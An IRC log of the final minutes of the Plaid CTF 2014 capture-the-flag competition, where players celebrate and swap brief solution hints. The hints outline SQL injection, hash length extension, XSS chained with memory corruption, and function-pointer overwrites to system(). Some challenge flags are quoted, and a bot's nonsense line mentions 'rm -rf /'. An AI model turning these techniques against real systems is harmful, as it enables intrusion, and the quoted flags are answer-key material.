  9897. (15:48:35) (sdjakl) sven: so do we tell em at timeout; or just wait for the writeups ;)
  9898. (15:48:46) (sven) sdjakl: timeout sounds good :)
  9899. (15:48:57) • +ricky is rooting for DS to solve jackshit
  9900. (15:48:59) (sven) it's seriously obvious now
  9901. (15:49:23) ••• jOin: (eZpl0it) ([email protected])
  9902. (15:49:35) ••• jOin: (antoniob) ([email protected])
  9903. (15:49:46) ••• mOde: (ChanServ) sets (+o mserrano)
  9904. (15:49:55) ••• tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 10 minutes left | $40 added to each cash prizes so far (from CHANCE card))
  9905. (15:49:57) (iZsh) ricky: we're still trying to solve 2 others :)
  9906. (15:50:02) (iZsh) might get one in time
  9907. (15:50:03) (iZsh) :)
  9908. (15:50:06) ••• qUit: (hellman) ([email protected]) Quit: Segmentation Fault
  9909. (15:50:34) ••• jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  9910. (15:51:06) ••• qUit: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223) Ping timeout: 240 seconds
  9911. (15:51:20) (+ricky) :-)
  9912. (15:51:24) (Guest68736) who can i ask for web100 ?
  9913. (15:51:24) (geobot) then does have to get in the video on web100 is so difficult
  9914. (15:51:25) ••• jOin: (hellman) ([email protected])
  9915. (15:51:25) (@mserrano) 8
  9916. (15:51:39) (Hero2Morow) what's the highest number of points possible?
  9917. (15:51:41) (+ricky) 7.73
  9918. (15:51:48) (mischa__) there is a web100?
  9919. (15:51:49) (geobot) web100?
  9920. (15:51:52) (dkohlbre) man this machine's clock is off by 3.5 minutes wtf
  9921. (15:51:59) (tokki) lol
  9922. (15:52:14) (Guest68736) yeah web100
  9923. (15:52:15) (poppopret) what time is it on the server's clock
  9924. (15:52:18) (Guest68736) who can i ask for it ?
  9925. (15:52:18) (Adran) there is a web100 when it decides to load
  9926. (15:52:55) ••• qUit: (kanghee) ([email protected]) Remote host closed the connection
  9927. (15:52:56) (@mserrano) 7
  9928. (15:53:09) (poppopret) 7?
  9929. (15:53:12) (Guest68736) mserrano: can i ask you smt for web100? in private
  9930. (15:53:13) (geobot) i feel bad for web100?
  9931. (15:53:25) (@mserrano) 6
  9932. (15:53:39) (poppopret) more minutes?
  9933. (15:53:49) (@mserrano) yes
  9934. (15:53:51) ••• jOin: (ronbarrey) ([email protected])
  9935. (15:53:52) (|x_x|) By the technological gods.
  9936. (15:53:54) (|x_x|) I nodded off.
  9937. (15:53:55) (|x_x|) >_<
  9938. (15:53:56) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  9939. (15:53:58) (LuckyY) but but chronosphere discharges in 8 minutes
  9940. (15:54:01) (Guest68736) someone i can pm for web100?
  9941. (15:54:04) (|x_x|) Dropped six places. Y_Y
  9942. (15:54:10) (tokki) lol the chronosphere
  9943. (15:54:16) (tokki) dat chronosphere
  9944. (15:54:25) (@mserrano) 5
  9945. (15:54:41) (|x_x|) Quick, everyone send me your keys. >_>
  9946. (15:54:49) (inter) trading keys
  9947. (15:54:54) (inter) dota2 keys for tf2 keys
  9948. (15:54:54) (geobot) so, tf2 is linked to sit on the edge of
  9949. (15:54:56) (inter) 1:1 ratio
  9950. (15:54:57) (yyyyyyy) |x_x|: http://www.dabeagle.com/images/old-golden-key.jpg
  9951. (15:54:57) (geobot) |x_x|: correct
  9952. (15:54:59) (Ymgve) blah, I could have done moscow if I had one more hour
  9953. (15:55:03) (poppopret) everyone refresh the hints page
  9954. (15:55:04) (phiber__) how much left?
  9955. (15:55:06) (inter) add my steam: pctfpls
  9956. (15:55:17) (Guest68736) someone i can pm for web100?
  9957. (15:55:22) (|x_x|) I've got a sanity check key up for swap. pst.
  9958. (15:55:22) (geobot) just read the story, basically they don't reuse keys from when we solved sanity check
  9959. (15:55:23) (@mserrano) 4min
  9960. (15:55:24) (poppopret) lol guest68736
  9961. (15:55:36) (Guest68736) i have the awnser i need something else
  9962. (15:55:42) (inter) clockish: im waiting on your writeup
  9963. (15:55:52) (tokki) 4min 240seconds!
  9964. (15:55:55) (iago-x86) Well, I guess that's it
  9965. (15:55:57) ••• jOin: (Sin__) ([email protected])
  9966. (15:56:00) (iago-x86) I'm not solving anything by then :)
  9967. (15:56:09) (inter) 4 minute 20 seconds
  9968. (15:56:10) (tsuro) iago-x86: same here :)
  9969. (15:56:12) (iago-x86) Damn you, blackjack!
  9970. (15:56:16) (iago-x86) tsuro: How'd you do?
  9971. (15:56:17) (inter) 420 blaze it
  9972. (15:56:19) (@mserrano) 3min
  9973. (15:56:19) (Ymgve) hope no one solves moscow
  9974. (15:56:22) (tokki) damn
  9975. (15:56:37) (tsuro) iago-x86: we're still 4th, crossing my fingers :)
  9976. (15:56:38) (@mserrano) Ymgve: I don't think anyone will :(
  9977. (15:56:43) (clockish) inter: heh, I'll just pm you the short version, other ppl can post real writeups :P
  9978. (15:56:46) (iago-x86) nice :)
  9979. (15:56:51) (tokki) tsuro: ftw!
  9980. (15:56:52) (wtbw) moscow got released a bit late it seems
  9981. (15:56:53) (_blasty_) j00 kn0w h4ck3rz lyk3 2 s3ll drugZ?
  9982. (15:56:55) (wtbw) downside of the board system
  9983. (15:56:59) (sven) we'd need another hour for moscow :/
  9984. (15:57:07) (iago-x86) tsuro: we're 36th, but with only 3 people who solved anything :)
  9985. (15:57:17) (+ricky) That's pretty impressive
  9986. (15:57:20) (@mserrano) 2 mi
  9987. (15:57:21) (@mserrano) n
  9988. (15:57:35) (wtbw) sven: if it was windows I might've managed it
  9989. (15:57:39) (wtbw) got a few more tools there :)
  9990. (15:57:41) (yyyyyyy) mserrano, what's a mi?
  9991. (15:57:42) (tomcr00se) i mean, 13th is better than 12th
  9992. (15:57:45) (wtbw) minute
  9993. (15:57:50) (@mserrano) yyyyyyy: meant minute, hit enter too early
  9994. (15:57:50) (asmoday) PENCILS DOWN GAME OVER
  9995. (15:57:55) (wtbw) tomcr00se: pft!
  9996. (15:57:58) (tokki) mserrano: lol
  9997. (15:58:00) (clockish) asmoday NOT YET
  9998. (15:58:01) (tsuro) iago-x86: yeah, we were far more than that
  9999. (15:58:03) (+ricky) Please pass your exam booklets to the front
  10000. (15:58:07) (+tylerni7) ricky: heh
  10001. (15:58:15) (chrissing) hahaha
  10002. (15:58:20) (@mserrano) 1 minute
  10003. (15:58:29) (iago-x86) I personally solved 7 challenges
  10004. (15:58:30) (tomcr00se) let me just submit my cheating stored keys brb one sec
  10005. (15:58:30) (geobot) brb - registering for the transposition cipher was hacktastic
  10006. (15:58:30) (+ricky) Who will submit the last key?
  10007. (15:58:31) (tsuro) iago-x86: we even have 3 students who get credits at our university if they play CTF competitions
  10008. (15:58:35) ••• qUit: (synthverity) ([email protected]) Ping timeout: 240 seconds
  10009. (15:58:37) (iago-x86) Nice! :)
  10010. (15:58:38) (+tylerni7) tomcr00se: :P
  10011. (15:58:40) (iZsh) dammit ENOTIME
  10012. (15:58:42) (+cai_) almost over
  10013. (15:58:45) (+cai_) in few seconds
  10014. (15:58:53) (inter) tomcr00se: ill give you a cookie with raisins in it
  10015. (15:58:57) (sven) time for murphy now
  10016. (15:59:06) (@mserrano) o.o
  10017. (15:59:08) (+ricky) 10
  10018. (15:59:12) (_blasty_) 9
  10019. (15:59:13) (zoku) nnooooo
  10020. (15:59:13) (|x_x|) 5
  10021. (15:59:13) (Ymgve) give tips for all tasks now pls
  10022. (15:59:14) (+ricky) 5
  10023. (15:59:16) (Adran) 4
  10024. (15:59:17) (+ricky) 2
  10025. (15:59:17) (+ricky) 1
  10026. (15:59:17) (|x_x|) 1
  10027. (15:59:18) (Adran) 3
  10028. (15:59:18) (+ricky) 0
  10029. (15:59:18) (poppopret) 4
  10030. (15:59:19) (yyyyyyy) -1e100
  10031. (15:59:19) (poppopret) 2
  10032. (15:59:20) (zoku) nooo wayyy
  10033. (15:59:20) (Reinhart) -1
  10034. (15:59:20) (poppopret) 5
  10035. (15:59:20) (Adran) -1
  10036. (15:59:20) (poppopret) 6
  10037. (15:59:21) (rray) 2 minutes left? guess i should start on bronies now
  10038. (15:59:22) (wtbw) omg_not_a_real_key
  10039. (15:59:22) (Reinhart) -2
  10040. (15:59:23) (+dickoff) GG!
  10041. (15:59:23) (|x_x|) ln(1023)
  10042. (15:59:24) (@mserrano) game over
  10043. (15:59:25) (+ricky) Good game!
  10044. (15:59:25) (_blasty_) >>> "%x" % (0xf0f+0xeb)
  10045. (15:59:25) (_blasty_) 'ffa'
  10046. (15:59:28) (sdjakl) woooo
  10047. (15:59:29) (tomcr00se) GG FOLKS
  10048. (15:59:30) ••• jOin: (sssssssss) (5a9c5102@gateway/web/freenode/ip.90.156.81.2)
  10049. (15:59:31) (Gynvael) GG
  10050. (15:59:31) (+cai_) GAME OVER
  10051. (15:59:31) (LuckyY) 502 Bad Gateway
  10052. (15:59:32) (chrissing) It was fun
  10053. (15:59:32) (+cai_) gg
  10054. (15:59:32) (LuckyY) :D
  10055. (15:59:33) (rray) gg
  10056. (15:59:33) (architekt) Good Game 8-)
  10057. (15:59:33) (poppopret) and 502 bad gateway!!
  10058. (15:59:35) (whois) good
  10059. (15:59:35) (iZsh) \o/
  10060. (15:59:36) (|x_x|) Now that it's all over. I'm going to spoil one of the challenges for you guys. Sanity Check's key was "poop"
  10061. (15:59:36) (wtbw) thanks PPP :)
  10062. (15:59:36) (computerality) _blasty_: mind=blown
  10063. (15:59:36) (geobot) didn't know that haven't solved sanity check key easily trackable by then :)
  10064. (15:59:37) (muchacho) wtf was the path in kpop?
  10065. (15:59:38) (x56) woop woop! gg and thanks :)
  10066. (15:59:39) (mischa__) nice ctf
  10067. (15:59:39) (iZsh) jeez
  10068. (15:59:40) (Adran) poppopret: yeah
  10069. (15:59:42) ••• mOde: (ChanServ) sets (+o cai_)
  10070. (15:59:44) (tokki) gg :D
  10071. (15:59:46) (plaintext) GG
  10072. (15:59:48) (ius) Thanks!
  10073. (15:59:49) (+dickoff) thanks for playing everyone :)
  10074. (15:59:49) (plaintext) thanks for the ctf
  10075. (15:59:52) (plaintext) what was multiplication?
  10076. (15:59:53) (KT) ok guy, whats 38.55 * 1700?
  10077. (15:59:54) (inter) gg
  10078. (15:59:56) (Ymgve) great ctf!
  10079. (15:59:56) (iZsh) so yeah, 0xffa = f0f + e
  10080. (15:59:57) (khloe_k) thx PPP
  10081. (15:59:58) (x56) 100000
  10082. (15:59:58) (Otacon22) gg
  10083. (16:00:00) (tomcr00se) 100,000
  10084. (16:00:00) (iZsh) so yeah, 0xffa = f0f + eb
  10085. (16:00:00) (Gynvael) gg
  10086. (16:00:01) (corpille) 100000
  10087. (16:00:01) (@mserrano) 38.55 * 1700 was 100000
  10088. (16:00:02) (Ymgve) KT: 100000 or something, excel bug
  10089. (16:00:02) (plaintext) wat
  10090. (16:00:03) ••• pArt: (HockeyInJune) (sid17970@gateway/web/irccloud.com/x-ctjiaaopkbcjhczm)
  10091. (16:00:03) (plaintext) why
  10092. (16:00:04) (tokki) thanks for making such an awesome ctf
  10093. (16:00:04) (architekt) Nice Game PPP
  10094. (16:00:05) (@mserrano) because of an excel 2007 bug
  10095. (16:00:07) (warrick) GOOOD GAME, THANKS PPP
  10096. (16:00:09) (tomcr00se) what was _nightmares_
  10097. (16:00:10) (ltfish) thank you guys for this game!
  10098. (16:00:10) (tokki) NOW TIME FOR WRITE UPS
  10099. (16:00:17) (tokki) thanks PPP :D
  10100. (16:00:18) (tomcr00se) real python pwning with shellcode?
  10101. (16:00:19) (wtbw) graphs was my favourite
  10102. (16:00:19) (geobot) we used it on how the pwning
  10103. (16:00:21) (Gynvael) thanks PPP ;)
  10104. (16:00:22) (_blasty_) THE FINAL FAIL ALLIANCE WOULD LIKE TO THANK PPP
  10105. (16:00:22) (Gynvael) gz 0xffa
  10106. (16:00:23) (plaintext) wh yis it 100,000?
  10107. (16:00:23) (|x_x|) http://scienceblogs.com/goodmath/2007/10/02/the-excel-65535100000-bug/ Read up on the 38.55 * 1700
  10108. (16:00:24) (Pitr_) thanks PPP!
  10109. (16:00:24) (Guest26684) redesvouz cookie, what was the BEEF damnit
  10110. (16:00:25) (_blasty_) FOR DIZ GAME
  10111. (16:00:27) (iZsh) thx guys
  10112. (16:00:28) (Ymgve) what was trojaned in the gcc challenge?
  10113. (16:00:29) ••• tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] GG; congrats 0xffa, Dragon Sector, MSLC | $40 added to each cash prizes so far (from CHANCE card))
  10114. (16:00:29) (bool_101) thanks PPP for a great game!
  10115. (16:00:29) (+tylerni7) Gynvael: you're welcome, nice job!
  10116. (16:00:32) (kris) GG
  10117. (16:00:34) ••• nIck: (bool_101) is now known as (bool101)
  10118. (16:00:36) (tokki) lol
  10119. (16:00:37) (comex) Ymgve: openssl
  10120. (16:00:37) (+awesie) http://lmgtfy.com/?q=65535+multiplication
  10121. (16:00:37) (moki) thanks for hosting this
  10122. (16:00:37) (plaintext) oh so it was trivia
  10123. (16:00:38) ••• pArt: (moki) ([email protected])
  10124. (16:00:39) (plaintext) nice
  10125. (16:00:39) (+houqp_) Guest26684: it's the beef
  10126. (16:00:40) (|x_x|) Multiplication is hard is an old Excel Sheet bug.
  10127. (16:00:41) (inter) thanks to mserrano, awesie, dickoff, frozencemetery, gbarboza, houqp_, ricky, tylerni7, and clockish for awsome challenges
  10128. (16:00:41) (dkohlbre) ok bbos, what was the password, I got into the emulator but it told me the key was the password :/
  10129. (16:00:42) (iago-x86) Gynvael: Hey, looking forward to our debrief at work :)
  10130. (16:00:43) (tokki) LeaveRet had an awesome time :D
  10131. (16:00:44) (abuss) Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
  10132. (16:00:45) (geobot) did a writeup
  10133. (16:00:47) ••• pArt: (EdHunter) ([email protected])
  10134. (16:00:48) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] IT'S OVER! | Survey: http://bit.ly/1ifQBOo | $40 added to each cash prizes so far (from CHANCE card))
  10135. (16:00:51) (ryan-c) so, did anyone solve rsa from scratch?
  10136. (16:00:53) (Adran) mserrano: thats terribe
  10137. (16:00:54) (clockish) tomcr00se: nightmares was writing to /proc/self/mem
  10138. (16:00:55) (poppopret) how'd you guys all do??
  10139. (16:00:55) (tokki) DAT MONIEZ
  10140. (16:00:57) (Gynvael) iago-x86: ;)
  10141. (16:01:01) (+dickoff) inter: you forgot cai_ !
  10142. (16:01:01) (abuss) (ignore the nuit du hack title, I don't know how2jekyll)
  10143. (16:01:01) (+frozencemetery) inter: :)
  10144. (16:01:04) (lavish) congrats ppp!
  10145. (16:01:10) (tomcr00se) clockish: omg duh :P...nice
  10146. (16:01:11) (lavish) classy chals as usual
  10147. (16:01:14) (Ymgve) comex: but openssl wasn't included, just gcc?
  10148. (16:01:17) (bool101) Grats 0xffa
  10149. (16:01:20) (+dickoff) I'm looking forward to people's writeups
  10150. (16:01:21) (@mserrano) tomcr00se: or use a code object!
  10151. (16:01:21) (ius) Thanks PPP!
  10152. (16:01:24) ••• qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Quit: Page closed
  10153. (16:01:25) (Adran) Thanks for the ctf guys
  10154. (16:01:25) (robbje) GG, nice CTF, thank you for hosting
  10155. (16:01:26) (@cai_) congrats to the winners :)
  10156. (16:01:27) (ius) esp. bronies was insane
  10157. (16:01:28) (ius) :D
  10158. (16:01:28) (+dickoff) ius: congrats!
  10159. (16:01:29) (lavish) and grats to the winners
  10160. (16:01:30) (@cai_) GG all
  10161. (16:01:30) (comex) Ymgve: if you compile openssl with that gcc, it gets backdoored
  10162. (16:01:31) (_blasty_) BRONIES.
  10163. (16:01:33) (someone_) what was the wallet id for mtpox
  10164. (16:01:36) (jagger_) gg - really nic challenges - a lot of fun instead of going through 100 iterations of guessing
  10165. (16:01:38) (ius) so much xss/mem corr
  10166. (16:01:40) ••• pArt: (_bcc) ([email protected])
  10167. (16:01:41) (Guest71506) gg
  10168. (16:01:42) (iago-x86) I can't believe we didn't solve the tor level... we have two tor devs on our team! :)
  10169. (16:01:42) (Ymgve) comex: that's the theory but we could never find the backdoor
  10170. (16:01:43) ••• pArt: (DoctorDelusional) ([email protected])
  10171. (16:01:44) (+awesie) dkohlbre: there was password to unlock the device, that password was the key
  10172. (16:01:46) (arthurdent) anyone want to make a googledox with all the writeups or something?
  10173. (16:01:49) (valis) wow, that was intensive - congrats 0xffa on bronies part 2
  10174. (16:01:50) (_blasty_) My captcha approach was suboptimal. I kept refreshing till I got 'Rarity'.
  10175. (16:01:52) ••• jOin: (Rexperience7) (~Rex@unaffiliated/rexperience7)
  10176. (16:01:53) (+tylerni7) iago-x86: hahahaha
  10177. (16:01:54) (Adran) what was the answer to polygon since I kept getting gatway issues?
  10178. (16:01:54) (_blasty_) Im gonna watch all of MLP now.
  10179. (16:01:56) (@mserrano) _blasty_: lol
  10180. (16:01:58) (sven) :D
  10181. (16:02:01) (iago-x86) _blasty_: haha, I did basically the same
  10182. (16:02:02) (lavish) someone_: I used group_concat and dumped the whole stuff
  10183. (16:02:03) (Adran) my little brony
  10184. (16:02:04) (tomcr00se) polygon was sql injection
  10185. (16:02:04) (+tylerni7) _blasty_: pony captcha is best captcha
  10186. (16:02:06) ••• qUit: (__vitor__) (806f3006@gateway/web/freenode/ip.128.111.48.6) Ping timeout: 240 seconds
  10187. (16:02:06) (Rexperience7) GJ Everyone
  10188. (16:02:07) (@mserrano) _blasty_: Ricky would refresh until he got Princess Celestia
  10189. (16:02:07) (+dickoff) iago-x86: what team are you on?
  10190. (16:02:09) (comex) Ymgve: i compiled openssl with the evil compiler and stock gcc 4.8.2, bindiff, easy to find the difference
  10191. (16:02:09) (dkohlbre) awesie: yes i know, i couldn't figure out how to get the password, I unlocked the device without it :P
  10192. (16:02:10) (Rexperience7) it was fun
  10193. (16:02:17) (Valodim) pony captcha kept me going ♥
  10194. (16:02:23) (sssssssss) what bug in web800?
  10195. (16:02:23) ••• jOin: (zzoru) (6e23254c@gateway/web/freenode/ip.110.35.37.76)
  10196. (16:02:23) (iago-x86) dickoff: "Nate Delivers Breakfast" or "ndb"
  10197. (16:02:28) (whois) what is bronies2??
  10198. (16:02:29) (+awesie) dkohlbre: yeah, that is why i made the key the password :)
  10199. (16:02:30) (geobot) we used in the password
  10200. (16:02:35) (sven) sssssssss: wait for our writeup :)
  10201. (16:02:39) (+awesie) dkohlbre: you could get the password from the nvram
  10202. (16:02:41) (sssssssss) sure
  10203. (16:02:43) (comex) (first i tried bindiffing the compiler but it was compiled with two different compilers itself or something)
  10204. (16:02:46) (clockish) sven: we're all waiting for your writeup :)
  10205. (16:02:47) (@mserrano) whois: xss -> arb. file read -> mem corruption -> flag
  10206. (16:02:53) ••• jOin: (cimmi_) (1f2d47df@gateway/web/freenode/ip.31.45.71.223)
  10207. (16:02:54) (+ricky) sssssssss: XSS in ponies site, stack buffer overflow leading to XSS in otp checking binary on login site, combine to steal cookie on login site
  10208. (16:02:57) (+awesie) dkohlbre: blackberry only uses sha1 to hash their device password :(
  10209. (16:02:58) (dkohlbre) awesie: thats what I figured,but I couldn't find any docs on it, and manual inspection wasn't turning it up
  10210. (16:03:00) (Ymgve) SHA1 hash of password was in mvram for blackberry
  10211. (16:03:04) (Ymgve) nvram
  10212. (16:03:13) (+ricky) sssssssss: Then there was an internal web server with more memory corruption to exploit
  10213. (16:03:14) (whois) memory couuption on /home/bigson/bigson binary?
  10214. (16:03:14) (Adran) mserrano: what was polygon? i saw the injection stuff, but then gateway sploded. :(
  10215. (16:03:14) ••• qUit: (Guest68736) (8d644bcc@gateway/web/freenode/ip.141.100.75.204) Quit: Page closed
  10216. (16:03:18) (abuss) Adran, http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
  10217. (16:03:20) (Guest26684) arthurdent: ctftime.org will can index em all, submit them there - https://ctftime.org/event/119/tasks/
  10218. (16:03:21) ([CISSP]HoLyVieR) For WhatApp, what SQL where we suppose to use that fits in 64 caracters ?
  10219. (16:03:21) (tomcr00se) and what was weeee?
  10220. (16:03:25) (Ymgve) also: fun fact, if you delete the nvram file, you can access the phone and read the message without any password
  10221. (16:03:26) (iago-x86) Adran: Poly was a blind sqli
  10222. (16:03:26) (tomcr00se) Adran: sql injection
  10223. (16:03:28) (Beched) hey anybody
  10224. (16:03:34) (@mserrano) Adran: blind sql
  10225. (16:03:34) (mongo12) stack buffer overflow leading to XSS? how so?
  10226. (16:03:35) (Beched) pls show flag for web200
  10227. (16:03:38) (ronbarrey) looking for soultion to web150
  10228. (16:03:40) (Adran) okay. yeah got to the sql injection. then gatway ate me.
  10229. (16:03:41) (Adran) cool
  10230. (16:03:42) (dkohlbre) Ymgve: did you find docs on how its stored? or just find a sha1 hash and roll with it
  10231. (16:03:46) (iZsh) ricky: dont sploil the writeups ;-)
  10232. (16:03:48) (iZsh) for bronies2
  10233. (16:03:49) ••• qUit: (nodocify) ([email protected]) Quit: Leaving
  10234. (16:03:52) (_blasty_) Im eh, not looking forward to do the full bronies writeup
  10235. (16:03:52) (_blasty_) lol
  10236. (16:03:58) (Adran) ronbarrey: sql injection to get flag
  10237. (16:03:58) (geobot) sql injection of rm -rf / sven: don't die
  10238. (16:03:59) (lavish) 23:01 < abuss> Writeup on web 100: http://sigint.ru/writeups/2014/04/13/plaidctf-2014-writeups/
  10239. (16:04:02) (lavish) change the page title
  10240. (16:04:03) (lavish) :P
  10241. (16:04:05) (Adran) abuss: thanks
  10242. (16:04:05) (Ymgve) dkohlbre: deleted original nvram, set a new password with "test", looked thru nvram for suspicious areas
  10243. (16:04:08) (rray) what was mtpox
  10244. (16:04:13) ••• qUit: (Hero2Morow) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  10245. (16:04:17) (Ymgve) the rest was thanks to google(tm) hash brute forcing
  10246. (16:04:19) (tomcr00se) so i had rop on harry_potter...what next?
  10247. (16:04:21) (abuss) lavish, <abuss> (ignore the nuit du hack title, I don't know how2jekyll)
  10248. (16:04:22) (abuss) hehehe
  10249. (16:04:22) (dkohlbre) Ymgve: did the exact same things... I'll take another look at my diff
  10250. (16:04:25) (dkohlbre) thanks
  10251. (16:04:26) ([CISSP]HoLyVieR) rray: mtbox what hash length extension + sqli
  10252. (16:04:28) (lavish) abuss: ooops
  10253. (16:04:29) (+ricky) iZsh: Sure thing, looking forward to reading
  10254. (16:04:33) (iago-x86) rray: mtpox was hash extension attack
  10255. (16:04:39) (iago-x86) google it, you'll find my blog as the second result. :)
  10256. (16:04:47) (yyyyyyy) so what was 20? :D
  10257. (16:04:49) (Beched) halphow2js FLAG pls, need to compare
  10258. (16:05:04) (bool101) yes what was the solution to harry_potter
  10259. (16:05:07) (rray) ahh, i was nowhere near solving mtpox :P
  10260. (16:05:09) (abuss) tomcr00se, how the hell did you get halphow2js so fast? 0.0
  10261. (16:05:12) (Ymgve) sooo was graphs supposed to be so easy to solve? (all private key vertices had a suspiciously low degree)
  10262. (16:05:16) (@mserrano) Ymgve: yes
  10263. (16:05:19) (tomcr00se) abuss: i have mad js skills :P
  10264. (16:05:21) (wtbw) Ymgve: treat it as a system of linear equations
  10265. (16:05:23) (@mserrano) Ymgve: you can just do Gaussian elimination and get a flag
  10266. (16:05:24) (abuss) well, better question, how were you suppoesd to get halphow2js :P
  10267. (16:05:24) (|x_x|) Time to start doing some writeups on what few I could do.
  10268. (16:05:27) (Valodim) lol graphs was awesome
  10269. (16:05:32) ••• pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  10270. (16:05:33) (Ymgve) wtbw: fuck that, count degrees, see where the jump is
  10271. (16:05:34) (clockish) Beched: w00t_i_are_mastar_web_hackar
  10272. (16:05:37) (Valodim) privkey.add(node[0])
  10273. (16:05:40) (Valodim) bam
  10274. (16:05:41) (mongo12) how do you get XSS out of the stack overflow, for bronies1? wtf
  10275. (16:05:42) (robbje) any writeup on zfs?
  10276. (16:05:45) ••• mOde: (cai_) sets (-o cai_)
  10277. (16:05:47) (whois) mserrano // how possible memory corruption bigson?
  10278. (16:05:48) (lavish) iago-x86: lol thank you! I used your hash_extender to solve mtpox!
  10279. (16:05:48) (Beched) clockish: thanks
  10280. (16:05:48) ••• qUit: (jinblack) ([email protected]) Remote host closed the connection
  10281. (16:05:51) (tomcr00se) also, i shamefully failed at hudak
  10282. (16:05:52) (Ymgve) there was like no vertices with degrees between 20 and 30
  10283. (16:05:53) (upb) [CISSP]HoLyVieR: but what do you extend b:0; to to get anything other than bool(false) ? :P
  10284. (16:05:56) (lavish) iago-x86: that program rulez
  10285. (16:05:57) (zoku) who wrote ezhp?
  10286. (16:06:02) (@mserrano) zoku: I did
  10287. (16:06:05) (tomcr00se) mserrano: i am so bad at your problems, paris and hudak
  10288. (16:06:05) (sven) heh, zfs was fun. aDR4eA solved that one in ~10 minutes :D
  10289. (16:06:07) (wtbw) Ymgve: oh, sneaky!
  10290. (16:06:08) ••• jOin: (Rinko) (3d812a67@gateway/web/cgi-irc/kiwiirc.com/ip.61.129.42.103)
  10291. (16:06:14) ••• jOin: (keidii) ([email protected])
  10292. (16:06:15) (Beched) was there any flag like flag{_0r1g1nally_t1m3_1$_running_0ut_} ??
  10293. (16:06:16) (geobot) i need to add more during the flag hack all the doors at once and sweaty bodies everywhere aswell
  10294. (16:06:16) (keidii) .
  10295. (16:06:17) (+cai_) >.>
  10296. (16:06:17) (zoku) ah, was I almost there mserrano?
  10297. (16:06:19) ([CISSP]HoLyVieR) upb: The string is reversed before being hashed
  10298. (16:06:22) (@mserrano) zoku: yes
  10299. (16:06:23) (robbje) sven: how? i didn't get it after 10h
  10300. (16:06:23) (wtbw) Ymgve: not a generic break though!
  10301. (16:06:27) (dkohlbre) where was the write/overflow in kappa? I had like 3 crash bugs and some arbitrary reads... but no writes
  10302. (16:06:28) • wtbw idealist
  10303. (16:06:31) (+dickoff) tomcr00se: paris was Frisk0's
  10304. (16:06:31) (whois) mserrano // bigson binary has corruption vuln?
  10305. (16:06:32) (@mserrano) tomcr00se: paris isn't mine - I did test it though
  10306. (16:06:36) (zoku) what system is it running on mserrano?
  10307. (16:06:36) (iago-x86) When I saw it was hash extension, I considered adding a bug to hash_extender ;)
  10308. (16:06:37) ••• qUit: (nolze) ([email protected]) Remote host closed the connection
  10309. (16:06:38) ••• nIck: (Mawekl|DrgnS) is now known as (Mawekl)
  10310. (16:06:38) (jix) using a SAT solver also worked fine to recover the private key for a given graph pubkey
  10311. (16:06:40) (+ricky) dickoff: kappa was type confusion (dickoff wrote it)
  10312. (16:06:42) (zoku) really curious why it's not working
  10313. (16:06:42) (iago-x86) I'm curious how many downloads I got this weekend
  10314. (16:06:42) (keidii) anyone can spoil details on bbos ?
  10315. (16:06:44) (wtbw) Paris was nice
  10316. (16:06:46) (Ymgve) wtbw: yeah, I thought about if there was a generic solution but too busy to follow it up
  10317. (16:06:47) ([CISSP]HoLyVieR) upb: and b:1; ... garbage .... b;0 deserialize give "true"
  10318. (16:06:49) (+ricky) dickoff: Sorry, that as for dkohlbre
  10319. (16:06:55) (lavish) iago-x86: lol
  10320. (16:06:59) (upb) [CISSP]HoLyVieR: oh hmm
  10321. (16:07:01) (@mserrano) zoku: 64-bit debian ami, using the i386 libraries from multiarch
  10322. (16:07:01) (Ymgve) is there a way to solve rendezvous without recompiling Tor?
  10323. (16:07:02) (rray) so.. whatscat, what was the solution?
  10324. (16:07:02) (Frisk0) I'm glad you liked Paris :)
  10325. (16:07:03) (dkohlbre) ricky: yeah, i just wasn't finding any writes I could control, ah well
  10326. (16:07:07) ••• qUit: (wahwah) ([email protected]) Quit: WeeChat 0.3.8
  10327. (16:07:09) ••• mOde: (mserrano) sets (+v Frisk0)
  10328. (16:07:12) ••• pArt: (Apple_Eater) ([email protected])
  10329. (16:07:12) ••• qUit: (snoopybbt) ([email protected]) Ping timeout: 240 seconds
  10330. (16:07:14) ••• jOin: (D3AdCa7) (d220a27e@gateway/web/freenode/ip.210.32.162.126)
  10331. (16:07:16) (tomcr00se) rray: sqli in username, or probably dns magic
  10332. (16:07:19) (AnthraX101) Serialize all the things!
  10333. (16:07:20) (choppers) dkohlbre: write to the art, overwrite the inspect() pointer to be system()
  10334. (16:07:27) ••• jOin: (oceanx_) ([email protected])
  10335. (16:07:28) (wtbw) Paris is the sort of thing that makes me want to code better analysis tools
  10336. (16:07:29) (+dickoff) dkohlbre: fill up your pokemon with kakuna, go catch a charizard, the art struct will now overflow the function pointer.
  10337. (16:07:30) (iago-x86) Finding system() was the hard part
  10338. (16:07:33) (zoku) ah, thanks mserrano
  10339. (16:07:33) ••• jOin: (blagh) ([email protected])
  10340. (16:07:33) (iago-x86) Well, not really
  10341. (16:07:34) (dkohlbre) choppers: goddammit im an idiot, I did that
  10342. (16:07:36) (oceanx_) damn I just solved nightmares :<
  10343. (16:07:38) (iago-x86) I just sucked. :)
  10344. (16:07:40) (D3AdCa7) how to solve web800 stage1.....
  10345. (16:07:41) (wtbw) because I'm sure it could e done much faster
  10346. (16:07:43) (wtbw) *be
  10347. (16:07:44) (+awesie) btw, i will post a blog post about the website issues and how we resolved them at some point
  10348. (16:07:49) (dkohlbre) choppers: literally did that and forgot it gets run
  10349. (16:07:51) (KT) what was the solution of "parlor"?
  10350. (16:07:52) (abuss) tomcr00se, dns magic?
  10351. (16:07:53) ••• jOin: (shabgrd) ([email protected])
  10352. (16:07:53) (@mserrano) did anyone like tiffany?
  10353. (16:07:53) ••• qUit: (shabgrd) ([email protected]) Changing host
